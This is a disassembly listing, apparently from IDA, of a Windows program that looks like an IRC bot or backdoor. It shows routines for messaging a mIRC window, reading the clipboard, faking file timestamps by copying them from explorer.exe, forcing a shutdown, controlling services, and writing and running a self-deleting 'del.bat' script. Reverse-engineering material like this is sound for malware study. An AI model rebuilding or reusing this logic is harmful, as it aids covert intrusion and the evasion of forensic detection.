mov edi, [ebp+arg_0]
xor esi, esi
cmp edi, esi
jz loc_407264
mov eax, [ebp+arg_4]
cmp eax, esi
jz loc_407264
cmp [ebp+arg_8], esi
jz loc_407264
cmp byte ptr [eax], 0
jz loc_407264
push ebx
push edi
call sub_421887
mov ebx, eax
test ebx, ebx
pop ecx
jz loc_40725F
push [ebp+arg_4]
push edi
call sub_4173D0
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz short loc_407258
sub eax, edi
push eax
push edi
push ebx
call sub_4169C0
mov eax, ebx
sub eax, edi
add esp, 0Ch
and byte ptr [eax+esi], 0
mov eax, [ebp+arg_8]
lea ecx, [eax+1]
loc_4071FA: ; CODE XREF: sub_40718D+72�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4071FA
sub eax, ecx
push eax
push [ebp+arg_8]
push ebx
call sub_4167D0
mov eax, [ebp+arg_4]
add esp, 0Ch
lea ecx, [eax+1]
loc_407216: ; CODE XREF: sub_40718D+8E�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_407216
sub eax, ecx
add eax, esi
mov esi, eax
loc_407223: ; CODE XREF: sub_40718D+9B�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_407223
mov edi, ebx
sub eax, esi
dec edi
loc_40722F: ; CODE XREF: sub_40718D+A8�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_40722F
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov esi, [ebp+arg_0]
mov edx, esi
mov eax, ebx
sub edx, ebx
loc_40724E: ; CODE XREF: sub_40718D+C9�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_40724E
loc_407258: ; CODE XREF: sub_40718D+50�j
push ebx
call sub_416C97
pop ecx
loc_40725F: ; CODE XREF: sub_40718D+3B�j
mov eax, esi
pop ebx
jmp short loc_407266
; ---------------------------------------------------------------------------
loc_407264: ; CODE XREF: sub_40718D+C�j
; sub_40718D+17�j ...
xor eax, eax
loc_407266: ; CODE XREF: sub_40718D+D5�j
pop edi
pop esi
pop ebp
retn
sub_40718D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40726A proc near ; CODE XREF: sub_40942B+C2�p
var_7D0 = dword ptr -7D0h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 7D0h
push ebx
push esi
push edi
xor eax, eax
mov ecx, 1F4h
lea edi, [ebp+var_7D0]
rep stosd
mov ecx, [ebp+arg_0]
mov eax, ecx
lea esi, [eax+1]
loc_40728D: ; CODE XREF: sub_40726A+28�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40728D
sub eax, esi
xor ebx, ebx
mov edi, eax
inc ebx
cmp edi, ebx
jge short loc_4072A4
or eax, 0FFFFFFFFh
jmp short loc_407304
; ---------------------------------------------------------------------------
loc_4072A4: ; CODE XREF: sub_40726A+33�j
xor edx, edx
test edi, edi
mov [ebp+var_7D0], ecx
jle short loc_4072C4
loc_4072B0: ; CODE XREF: sub_40726A+58�j
mov al, [edx+ecx]
cmp al, 0Ah
jz short loc_4072BB
cmp al, 0Dh
jnz short loc_4072BF
loc_4072BB: ; CODE XREF: sub_40726A+4B�j
and byte ptr [edx+ecx], 0
loc_4072BF: ; CODE XREF: sub_40726A+4F�j
inc edx
cmp edx, edi
jl short loc_4072B0
loc_4072C4: ; CODE XREF: sub_40726A+44�j
xor esi, esi
test edi, edi
jle short loc_4072EE
loc_4072CA: ; CODE XREF: sub_40726A+82�j
cmp byte ptr [esi+ecx], 0
jnz short loc_4072E9
lea edx, [esi+ecx+1]
cmp byte ptr [edx], 0
jz short loc_4072E9
cmp ebx, 1F4h
jge short loc_4072EE
mov [ebp+ebx*4+var_7D0], edx
inc ebx
loc_4072E9: ; CODE XREF: sub_40726A+64�j
; sub_40726A+6D�j
inc esi
cmp esi, edi
jl short loc_4072CA
loc_4072EE: ; CODE XREF: sub_40726A+5E�j
; sub_40726A+75�j
mov edi, [ebp+arg_4]
test edi, edi
jz short loc_407302
mov ecx, 1F4h
lea esi, [ebp+var_7D0]
rep movsd
loc_407302: ; CODE XREF: sub_40726A+89�j
mov eax, ebx
loc_407304: ; CODE XREF: sub_40726A+38�j
pop edi
pop esi
pop ebx
leave
retn
sub_40726A endp
; =============== S U B R O U T I N E =======================================
sub_407309 proc near ; CODE XREF: sub_4076B7+26�p
; sub_4076F4+79�p
arg_0 = byte ptr 4
movsx eax, [esp+arg_0]
push eax
call sub_41795A
cmp al, 61h
pop ecx
jl short loc_407324
cmp al, 7Ah
jg short loc_407324
movsx eax, al
sub eax, 60h
retn
; ---------------------------------------------------------------------------
loc_407324: ; CODE XREF: sub_407309+E�j
; sub_407309+12�j
xor eax, eax
retn
sub_407309 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407327 proc near ; CODE XREF: sub_409806+30CC�p
; sub_409806+3F75�p
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 100h
push esi
call dword_422004 ; RtlGetLastWin32Error
push 0
push 100h
mov esi, eax
lea eax, [ebp+var_100]
push eax
push 400h
push esi
push 0
push 1200h
call dword_4220A8 ; FormatMessageA
lea eax, [ebp+var_100]
loc_407360: ; CODE XREF: sub_407327+46�j
mov cl, [eax]
cmp cl, 1Fh
jg short loc_40736C
cmp cl, 9
jnz short loc_40736F
loc_40736C: ; CODE XREF: sub_407327+3E�j
inc eax
jmp short loc_407360
; ---------------------------------------------------------------------------
loc_40736F: ; CODE XREF: sub_407327+43�j
; sub_407327+5B�j ...
and byte ptr [eax], 0
dec eax
lea ecx, [ebp+var_100]
cmp eax, ecx
jb short loc_407389
mov cl, [eax]
cmp cl, 2Eh
jz short loc_40736F
cmp cl, 21h
jl short loc_40736F
loc_407389: ; CODE XREF: sub_407327+54�j
push esi
lea eax, [ebp+var_100]
push eax
push [ebp+arg_0]
mov esi, offset dword_43A568
push offset aSErrorSD_ ; "%s Error: %s <%d>."
push 200h
push esi
call sub_416B5D
add esp, 18h
mov eax, esi
pop esi
leave
retn
sub_407327 endp
; =============== S U B R O U T I N E =======================================
sub_4073B1 proc near ; CODE XREF: sub_409806+4C4C�p
push esi
push 0
call dword_43A33C ; OpenClipboard
test eax, eax
jz short loc_4073E8
push 1
call dword_43A4D4 ; GetClipboardData
mov esi, eax
test esi, esi
jz short loc_4073E8
push edi
push esi
call dword_4220B0 ; GlobalLock
push esi
mov edi, eax
call dword_4220AC ; GlobalUnlock
call dword_43A320 ; CloseClipboard
mov eax, edi
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_4073E8: ; CODE XREF: sub_4073B1+B�j
; sub_4073B1+19�j
xor eax, eax
pop esi
retn
sub_4073B1 endp
; =============== S U B R O U T I N E =======================================
sub_4073EC proc near ; CODE XREF: sub_409806+3DE3�p
arg_0 = dword ptr 4
push ebp
push esi
push edi
xor esi, esi
push esi
mov edi, offset aMirc_0 ; "mIRC"
push edi
call dword_43A3F8 ; FindWindowA
mov ebp, eax
cmp ebp, esi
jz short loc_407468
push ebx
push edi
push 1000h
push esi
push 4
push esi
push 0FFFFFFFFh
call dword_4220BC ; CreateFileMappingA
push esi
push esi
push esi
mov edi, eax
push 0F001Fh
push edi
call dword_4220B8 ; MapViewOfFile
push [esp+10h+arg_0]
mov ebx, eax
push ebx
call sub_416905
pop ecx
pop ecx
push esi
push 1
push 4C8h
push ebp
call dword_43A464 ; SendMessageA
push esi
push 1
push 4C9h
push ebp
call dword_43A464 ; SendMessageA
push ebx
call dword_4220B4 ; UnmapViewOfFile
push edi
call dword_42202C ; CloseHandle
xor eax, eax
inc eax
pop ebx
jmp short loc_40746A
; ---------------------------------------------------------------------------
loc_407468: ; CODE XREF: sub_4073EC+16�j
xor eax, eax
loc_40746A: ; CODE XREF: sub_4073EC+7A�j
pop edi
pop esi
pop ebp
retn
sub_4073EC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40746E proc near ; CODE XREF: sub_40FAD0+21E�p
var_11C = byte ptr -11Ch
var_18 = byte ptr -18h
var_10 = byte ptr -10h
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 11Ch
push esi
xor esi, esi
push esi
lea eax, [ebp+var_11C]
push eax
push 104h
push esi
push offset aExplorer_exe ; "explorer.exe"
push esi
call dword_43A3BC ; SearchPathA
test eax, eax
jz short loc_40750F
push ebx
push edi
push esi
mov edi, 80h
push edi
push 3
push esi
mov esi, dword_422034
push 1
push 80000000h
lea eax, [ebp+var_11C]
push eax
call esi ; CreateFileA
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz short loc_40750D
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_10]
push eax
push ebx
call dword_4220C4 ; GetFileTime
push ebx
mov ebx, dword_42202C
call ebx ; CloseHandle
push 0
push edi
push 3
push 0
push 2
push 40000000h
push [ebp+arg_0]
call esi ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_40750D
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_10]
push eax
push esi
call dword_4220C0 ; SetFileTime
push esi
call ebx ; CloseHandle
loc_40750D: ; CODE XREF: sub_40746E+51�j
; sub_40746E+87�j
pop edi
pop ebx
loc_40750F: ; CODE XREF: sub_40746E+28�j
pop esi
leave
retn
sub_40746E endp
; =============== S U B R O U T I N E =======================================
sub_407512 proc near ; CODE XREF: sub_409806+117A�p
push 1
push offset aSeshutdownpriv ; "SeShutdownPrivilege"
call sub_408C9C
pop ecx
pop ecx
push 50005h
push 6
call dword_43A43C ; ExitWindowsEx
neg eax
sbb eax, eax
neg eax
retn
sub_407512 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407534 proc near ; CODE XREF: sub_402C2F+495�p
; sub_409806+4EFF�p
var_764 = byte ptr -764h
var_364 = byte ptr -364h
var_260 = byte ptr -260h
var_15C = byte ptr -15Ch
var_58 = dword ptr -58h
var_4C = dword ptr -4Ch
var_2C = dword ptr -2Ch
var_28 = word ptr -28h
var_14 = byte ptr -14h
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 764h
push ebx
xor ebx, ebx
cmp dword_42FCD0, ebx
push esi
jz short loc_407558
cmp dword_43A508, ebx
jnz short loc_407558
push ebx
call sub_40210D
pop ecx
loc_407558: ; CODE XREF: sub_407534+13�j
; sub_407534+1B�j
lea eax, [ebp+var_764]
push eax
push 400h
call dword_4220D0 ; GetTempPathA
lea eax, [ebp+var_764]
push eax
lea eax, [ebp+var_260]
push offset aSdel_bat ; "%sdel.bat"
push eax
call sub_416905
add esp, 0Ch
push ebx
push ebx
push 2
push ebx
push ebx
push 40000000h
lea eax, [ebp+var_260]
push eax
call dword_422034 ; CreateFileA
mov esi, eax
cmp esi, ebx
jbe loc_4076B3
lea eax, [ebp+var_260]
push eax
lea eax, [ebp+var_764]
push offset a@echoOffRepeat ; "@echo off\r\n:repeat\r\ndel \"%%1\"\r\nif exist"...
push eax
call sub_416905
lea eax, [ebp+var_764]
add esp, 0Ch
lea edx, [eax+1]
loc_4075CB: ; CODE XREF: sub_407534+9C�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_4075CB
push edi
push ebx
lea ecx, [ebp+var_4]
push ecx
sub eax, edx
push eax
lea eax, [ebp+var_764]
push eax
push esi
call dword_422030 ; WriteFile
push esi
call dword_42202C ; CloseHandle
xor eax, eax
lea edi, [ebp+var_14]
stosd
stosd
stosd
push 11h
stosd
pop ecx
xor eax, eax
lea edi, [ebp+var_58]
rep stosd
mov esi, 104h
push esi
lea eax, [ebp+var_15C]
push eax
push ebx
mov [ebp+var_4C], 422B0Ah
mov [ebp+var_58], 44h
mov [ebp+var_2C], 1
mov [ebp+var_28], bx
call dword_4220A4 ; GetModuleHandleA
push eax
call dword_42200C ; GetModuleFileNameA
lea eax, [ebp+var_15C]
push eax
call dword_4220A0 ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
pop edi
jz short loc_40765C
push 80h
lea eax, [ebp+var_15C]
push eax
call dword_4220CC ; SetFileAttributesA
loc_40765C: ; CODE XREF: sub_407534+114�j
lea eax, [ebp+var_15C]
push eax
lea eax, [ebp+var_260]
push eax
lea eax, [ebp+var_764]
push offset aComspecCSS ; "%%comspec%% /c %s %s"
push eax
call sub_416905
add esp, 10h
push esi
lea eax, [ebp+var_364]
push eax
lea eax, [ebp+var_764]
push eax
call dword_4220C8 ; ExpandEnvironmentStringsA
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_58]
push eax
push ebx
push ebx
push 4010h
push ebx
push ebx
push ebx
lea eax, [ebp+var_364]
push eax
push ebx
call dword_422044 ; CreateProcessA
loc_4076B3: ; CODE XREF: sub_407534+6D�j
pop esi
pop ebx
leave
retn
sub_407534 endp
; =============== S U B R O U T I N E =======================================
sub_4076B7 proc near ; CODE XREF: sub_4076F4+41�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_4]
push esi
push edi
mov edi, [esp+8+arg_8]
mov ecx, 1F4h
rep stosd
lea edi, [eax-1]
xor esi, esi
test edi, edi
jl short loc_4076F1
push ebx
mov ebx, edi
loc_4076D4: ; CODE XREF: sub_4076B7+37�j
mov eax, [esp+0Ch+arg_0]
movsx eax, byte ptr [esi+eax]
push eax
call sub_407309
pop ecx
mov ecx, [esp+0Ch+arg_8]
inc esi
mov [ecx+eax*4], ebx
dec ebx
cmp esi, edi
jle short loc_4076D4
pop ebx
loc_4076F1: ; CODE XREF: sub_4076B7+18�j
pop edi
pop esi
retn
sub_4076B7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4076F4 proc near ; CODE XREF: sub_401FAD+10�p
; sub_401FDF+A0�p
var_100C = dword ptr -100Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 100Ch
call sub_416B20
mov eax, [ebp+arg_0]
lea edx, [eax+1]
loc_407707: ; CODE XREF: sub_4076F4+18�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_407707
sub eax, edx
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
lea ecx, [eax+1]
loc_407719: ; CODE XREF: sub_4076F4+2A�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_407719
push ebx
push esi
sub eax, ecx
mov esi, eax
push edi
lea eax, [ebp+var_100C]
push eax
push esi
push [ebp+arg_4]
mov [ebp+var_C], esi
call sub_4076B7
add esp, 0Ch
dec esi
mov edi, esi
jmp short loc_4077B6
; ---------------------------------------------------------------------------
loc_407742: ; CODE XREF: sub_4076F4+C4�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [esi+eax]
push eax
call sub_41795A
mov ebx, eax
mov eax, [ebp+arg_0]
movsx eax, byte ptr [edi+eax]
push eax
call sub_41795A
cmp eax, ebx
pop ecx
pop ecx
jz short loc_4077B4
loc_407764: ; CODE XREF: sub_4076F4+BE�j
mov ebx, [ebp+arg_0]
xor eax, eax
mov al, [edi+ebx]
push eax
call sub_407309
mov edx, [ebp+var_C]
mov eax, [ebp+eax*4+var_100C]
pop ecx
mov ecx, edx
sub ecx, esi
cmp ecx, eax
jle short loc_407787
mov eax, ecx
loc_407787: ; CODE XREF: sub_4076F4+8F�j
add edi, eax
cmp edi, [ebp+var_4]
jge short loc_4077C4
mov eax, [ebp+arg_4]
lea esi, [edx-1]
movsx eax, byte ptr [esi+eax]
push eax
call sub_41795A
movsx ecx, byte ptr [edi+ebx]
push ecx
mov [ebp+var_8], eax
call sub_41795A
pop ecx
pop ecx
mov ecx, [ebp+var_8]
cmp eax, ecx
jnz short loc_407764
loc_4077B4: ; CODE XREF: sub_4076F4+6E�j
dec edi
dec esi
loc_4077B6: ; CODE XREF: sub_4076F4+4C�j
test esi, esi
jg short loc_407742
mov eax, [ebp+arg_0]
add eax, edi
loc_4077BF: ; CODE XREF: sub_4076F4+D2�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_4077C4: ; CODE XREF: sub_4076F4+98�j
xor eax, eax
jmp short loc_4077BF
sub_4076F4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4077C8 proc near ; CODE XREF: sub_4082A9+20�p
var_1C = byte ptr -1Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push edi
push 0F003Fh
xor ebx, ebx
push ebx
push ebx
call dword_43A460 ; OpenSCManagerA
mov edi, eax
cmp edi, ebx
jnz short loc_4077EF
call dword_422004 ; RtlGetLastWin32Error
mov ebx, eax
jmp short loc_407864
; ---------------------------------------------------------------------------
loc_4077EF: ; CODE XREF: sub_4077C8+1B�j
push esi
push 0F01FFh
push [ebp+arg_4]
push edi
call dword_43A4E0 ; OpenServiceA
mov esi, eax
cmp esi, ebx
jnz short loc_40780F
call dword_422004 ; RtlGetLastWin32Error
mov ebx, eax
jmp short loc_40785C
; ---------------------------------------------------------------------------
loc_40780F: ; CODE XREF: sub_4077C8+3B�j
mov eax, [ebp+arg_0]
cmp eax, 1
jz short loc_407842
cmp eax, 3
jz short loc_407833
jle short loc_407855
cmp eax, 6
jg short loc_407855
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_8]
push esi
call dword_43A484 ; ControlService
jmp short loc_407849
; ---------------------------------------------------------------------------
loc_407833: ; CODE XREF: sub_4077C8+52�j
push [ebp+arg_10]
push [ebp+arg_C]
push esi
call dword_43A468 ; StartServiceA
jmp short loc_407849
; ---------------------------------------------------------------------------
loc_407842: ; CODE XREF: sub_4077C8+4D�j
push esi
call dword_43A390 ; DeleteService
loc_407849: ; CODE XREF: sub_4077C8+69�j
; sub_4077C8+78�j
test eax, eax
jnz short loc_407855
call dword_422004 ; RtlGetLastWin32Error
mov ebx, eax
loc_407855: ; CODE XREF: sub_4077C8+54�j
; sub_4077C8+59�j ...
push esi
call dword_43A3CC ; CloseServiceHandle
loc_40785C: ; CODE XREF: sub_4077C8+45�j
push edi
call dword_43A3CC ; CloseServiceHandle
pop esi
loc_407864: ; CODE XREF: sub_4077C8+25�j
pop edi
mov eax, ebx
pop ebx
leave
retn
sub_4077C8 endp
; =============== S U B R O U T I N E =======================================
sub_40786A proc near ; CODE XREF: sub_4082A9:loc_4082F1�p
mov ecx, 420h
cmp eax, ecx
ja loc_40791B
jz loc_407914
add ecx, 0FFFFFFFBh
cmp eax, ecx
ja short loc_4078DE
jz short loc_4078D4
mov ecx, eax
sub ecx, 3
jz short loc_4078CA
dec ecx
dec ecx
jz short loc_4078C0
dec ecx
jz short loc_4078B6
sub ecx, 51h
jz short loc_4078AC
sub ecx, 24h
jnz loc_407991 ; default
; jumptable 00407938 cases 1,5,6,8,9,12,13,15,16
push offset aTheSpecifiedSe ; "The specified service name is invalid."
jmp loc_407983
; ---------------------------------------------------------------------------
loc_4078AC: ; CODE XREF: sub_40786A+2D�j
push offset aTheRequestedCo ; "The requested control code is undefined"...
jmp loc_407983
; ---------------------------------------------------------------------------
loc_4078B6: ; CODE XREF: sub_40786A+28�j
push offset aTheHandleIsInv ; "The handle is invalid."
jmp loc_407983
; ---------------------------------------------------------------------------
loc_4078C0: ; CODE XREF: sub_40786A+25�j
push offset aTheHandleDoesN ; "The handle does not have the required a"...
jmp loc_407983
; ---------------------------------------------------------------------------
loc_4078CA: ; CODE XREF: sub_40786A+21�j
push offset aTheServiceBina ; "The service binary file could not be fo"...
jmp loc_407983
; ---------------------------------------------------------------------------
loc_4078D4: ; CODE XREF: sub_40786A+1A�j
push offset aTheServiceCann ; "The service cannot be stopped because o"...
jmp loc_407983
; ---------------------------------------------------------------------------
loc_4078DE: ; CODE XREF: sub_40786A+18�j
mov ecx, eax
sub ecx, 41Ch
jz short loc_40790D
dec ecx
jz short loc_407906
dec ecx
jz short loc_4078FF
dec ecx
jnz loc_407991 ; default
; jumptable 00407938 cases 1,5,6,8,9,12,13,15,16
push offset aTheDatabaseIsL ; "The database is locked."
jmp loc_407983
; ---------------------------------------------------------------------------
loc_4078FF: ; CODE XREF: sub_40786A+82�j
push offset aAThreadCouldNo ; "A thread could not be created for the s"...
jmp short loc_407983
; ---------------------------------------------------------------------------
loc_407906: ; CODE XREF: sub_40786A+7F�j
push offset aTheProcessForT ; "The process for the service was started"...
jmp short loc_407983
; ---------------------------------------------------------------------------
loc_40790D: ; CODE XREF: sub_40786A+7C�j
push offset aTheRequested_0 ; "The requested control code is not valid"...
jmp short loc_407983
; ---------------------------------------------------------------------------
loc_407914: ; CODE XREF: sub_40786A+D�j
push offset aAnInstanceOfTh ; "An instance of the service is already r"...
jmp short loc_407983
; ---------------------------------------------------------------------------
loc_40791B: ; CODE XREF: sub_40786A+7�j
mov ecx, 45Bh
cmp eax, ecx
ja short loc_407991 ; default
; jumptable 00407938 cases 1,5,6,8,9,12,13,15,16
jz short loc_40797E
lea ecx, [eax-422h]
cmp ecx, 11h ; switch 18 cases
ja short loc_407991 ; default
; jumptable 00407938 cases 1,5,6,8,9,12,13,15,16
movzx ecx, byte_4079D2[ecx]
jmp off_4079AA[ecx*4] ; switch jump
loc_40793F: ; DATA XREF: .text:off_4079AA�o
push offset aTheSpecifiedDa ; jumptable 00407938 case 7
jmp short loc_407983
; ---------------------------------------------------------------------------
loc_407946: ; CODE XREF: sub_40786A+CE�j
; DATA XREF: .text:off_4079AA�o
push offset aTheServiceDepe ; jumptable 00407938 case 17
jmp short loc_407983
; ---------------------------------------------------------------------------
loc_40794D: ; CODE XREF: sub_40786A+CE�j
; DATA XREF: .text:off_4079AA�o
push offset aTheServiceDe_0 ; jumptable 00407938 case 10
jmp short loc_407983
; ---------------------------------------------------------------------------
loc_407954: ; CODE XREF: sub_40786A+CE�j
; DATA XREF: .text:off_4079AA�o
push offset aTheServiceHasB ; jumptable 00407938 case 0
jmp short loc_407983
; ---------------------------------------------------------------------------
loc_40795B: ; CODE XREF: sub_40786A+CE�j
; DATA XREF: .text:off_4079AA�o
push offset aTheSpecified_0 ; jumptable 00407938 case 2
jmp short loc_407983
; ---------------------------------------------------------------------------
loc_407962: ; CODE XREF: sub_40786A+CE�j
; DATA XREF: .text:off_4079AA�o
push offset aTheServiceCoul ; jumptable 00407938 case 11
jmp short loc_407983
; ---------------------------------------------------------------------------
loc_407969: ; CODE XREF: sub_40786A+CE�j
; DATA XREF: .text:off_4079AA�o
push offset aTheServiceHa_0 ; jumptable 00407938 case 14
jmp short loc_407983
; ---------------------------------------------------------------------------
loc_407970: ; CODE XREF: sub_40786A+CE�j
; DATA XREF: .text:off_4079AA�o
push offset aTheRequested_1 ; jumptable 00407938 case 3
jmp short loc_407983
; ---------------------------------------------------------------------------
loc_407977: ; CODE XREF: sub_40786A+CE�j
; DATA XREF: .text:off_4079AA�o
push offset aTheServiceHasN ; jumptable 00407938 case 4
jmp short loc_407983
; ---------------------------------------------------------------------------
loc_40797E: ; CODE XREF: sub_40786A+BA�j
push offset aTheSystemIsShu ; "The system is shutting down."
loc_407983: ; CODE XREF: sub_40786A+3D�j
; sub_40786A+47�j ...
push offset dword_43A768
call sub_416905
pop ecx
pop ecx
jmp short loc_4079A4
; ---------------------------------------------------------------------------
loc_407991: ; CODE XREF: sub_40786A+32�j
; sub_40786A+85�j ...
push eax ; default
; jumptable 00407938 cases 1,5,6,8,9,12,13,15,16
push offset aAnUnknownErr_0 ; "An unknown error occurred: <%ld>"
push offset dword_43A768
call sub_416905
add esp, 0Ch
loc_4079A4: ; CODE XREF: sub_40786A+125�j
mov eax, offset dword_43A768
retn
sub_40786A endp
; ---------------------------------------------------------------------------
off_4079AA dd offset loc_407954 ; DATA XREF: sub_40786A+CE�r
dd offset loc_40795B ; jump table for switch statement
dd offset loc_407970
dd offset loc_407977
dd offset loc_40793F
dd offset loc_40794D
dd offset loc_407962
dd offset loc_407969
dd offset loc_407946
dd offset loc_407991
byte_4079D2 db 0, 9, 1, 2 ; DATA XREF: sub_40786A+C7�r
db 3, 9, 9, 4 ; indirect table for switch statement
db 9, 9, 5, 6
db 9, 9, 7, 9
db 9, 8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4079E4 proc near ; CODE XREF: sub_409806+1F19�p
var_38C = byte ptr -38Ch
var_18C = byte ptr -18Ch
var_188 = byte ptr -188h
var_24 = byte ptr -24h
var_20 = byte ptr -20h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 38Ch
push ebx
push esi
push edi
xor ebx, ebx
push 0F003Fh
push ebx
push ebx
mov [ebp+var_8], ebx
call dword_43A460 ; OpenSCManagerA
push ebx
push [ebp+arg_8]
mov [ebp+var_C], eax
push offset aTheFollowingWi ; "The following Windows services are regi"...
push [ebp+arg_4]
push [ebp+arg_0]
call sub_405D20
add esp, 14h
loc_407A1C: ; CODE XREF: sub_4079E4+123�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_24]
push eax
push 168h
lea eax, [ebp+var_18C]
push eax
push 3
push 30h
push [ebp+var_C]
call dword_43A470 ; EnumServicesStatusA
test eax, eax
jnz short loc_407A56
call dword_422004 ; RtlGetLastWin32Error
cmp eax, 0EAh
jnz loc_407B0D
loc_407A56: ; CODE XREF: sub_4079E4+5F�j
xor edi, edi
cmp [ebp+var_4], ebx
jle loc_407B04
lea esi, [ebp+var_188]
loc_407A67: ; CODE XREF: sub_4079E4+11A�j
mov eax, [esi+8]
dec eax
jz short loc_407AB3
dec eax
jz short loc_407AAC
dec eax
jz short loc_407AA5
dec eax
jz short loc_407A9E
dec eax
jz short loc_407A97
dec eax
jz short loc_407A90
dec eax
lea eax, [ebp+var_20]
jz short loc_407A89
push offset aUnknown_0 ; " Unknown"
jmp short loc_407ABB
; ---------------------------------------------------------------------------
loc_407A89: ; CODE XREF: sub_4079E4+9C�j
push offset aPaused_0 ; " Paused"
jmp short loc_407ABB
; ---------------------------------------------------------------------------
loc_407A90: ; CODE XREF: sub_4079E4+96�j
push offset aPausing ; " Pausing"
jmp short loc_407AB8
; ---------------------------------------------------------------------------
loc_407A97: ; CODE XREF: sub_4079E4+93�j
push offset aContinuing ; " Continuing"
jmp short loc_407AB8
; ---------------------------------------------------------------------------
loc_407A9E: ; CODE XREF: sub_4079E4+90�j
push offset aRunning ; " Running"
jmp short loc_407AB8
; ---------------------------------------------------------------------------
loc_407AA5: ; CODE XREF: sub_4079E4+8D�j
push offset aStoping ; " Stoping"
jmp short loc_407AB8
; ---------------------------------------------------------------------------
loc_407AAC: ; CODE XREF: sub_4079E4+8A�j
push offset aStarting ; " Starting"
jmp short loc_407AB8
; ---------------------------------------------------------------------------
loc_407AB3: ; CODE XREF: sub_4079E4+87�j
push offset aStopped ; " Stopped"
loc_407AB8: ; CODE XREF: sub_4079E4+B1�j
; sub_4079E4+B8�j ...
lea eax, [ebp+var_20]
loc_407ABB: ; CODE XREF: sub_4079E4+A3�j
; sub_4079E4+AA�j
push eax
call sub_416905
pop ecx
pop ecx
push dword ptr [esi]
lea eax, [ebp+var_20]
push dword ptr [esi-4]
push eax
lea eax, [ebp+var_38C]
push offset aSSS_0 ; "%s: %s (%s)"
push eax
call sub_416905
push 1
push [ebp+arg_8]
lea eax, [ebp+var_38C]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_405D20
add esp, 28h
inc edi
add esi, 24h
cmp edi, [ebp+var_4]
jl loc_407A67
loc_407B04: ; CODE XREF: sub_4079E4+77�j
cmp [ebp+var_8], ebx
jnz loc_407A1C
loc_407B0D: ; CODE XREF: sub_4079E4+6C�j
push [ebp+var_C]
call dword_43A3CC ; CloseServiceHandle
xor eax, eax
cmp eax, [ebp+var_4]
pop edi
sbb eax, eax
pop esi
neg eax
pop ebx
leave
retn
sub_4079E4 endp
; =============== S U B R O U T I N E =======================================
sub_407B24 proc near ; CODE XREF: sub_407BE6+A�p
; sub_407BE6+14�p ...
arg_0 = dword ptr 4
push ebp
mov ebp, [esp+4+arg_0]
xor eax, eax
cmp ebp, eax
jnz short loc_407B31
pop ebp
retn
; ---------------------------------------------------------------------------
loc_407B31: ; CODE XREF: sub_407B24+9�j
push ebx
push esi
mov esi, dword_4220D4
push edi
push eax
push eax
push 0FFFFFFFFh
push ebp
push 1
push eax
call esi ; MultiByteToWideChar
mov edi, eax
lea eax, [edi+edi+2]
push eax
call sub_41797C
pop ecx
push edi
mov ebx, eax
push ebx
push 0FFFFFFFFh
push ebp
push 1
push 0
call esi ; MultiByteToWideChar
pop edi
pop esi
mov eax, ebx
pop ebx
pop ebp
retn
sub_407B24 endp
; =============== S U B R O U T I N E =======================================
sub_407B65 proc near ; CODE XREF: sub_4112AD+248�p
arg_10 = dword ptr 14h
arg_14 = dword ptr 18h
arg_20 = dword ptr 24h
mov eax, offset loc_421EBD
call sub_417DE0
push esi
xor esi, esi
cmp [esp+4+arg_10], esi
jnz short loc_407B7C
xor eax, eax
jmp short loc_407BD8
; ---------------------------------------------------------------------------
loc_407B7C: ; CODE XREF: sub_407B65+11�j
push ebx
push ebp
push edi
mov edi, dword_4220D8
push esi
push esi
push esi
push esi
push 0FFFFFFFFh
push [esp+24h+arg_10]
mov ebx, 400h
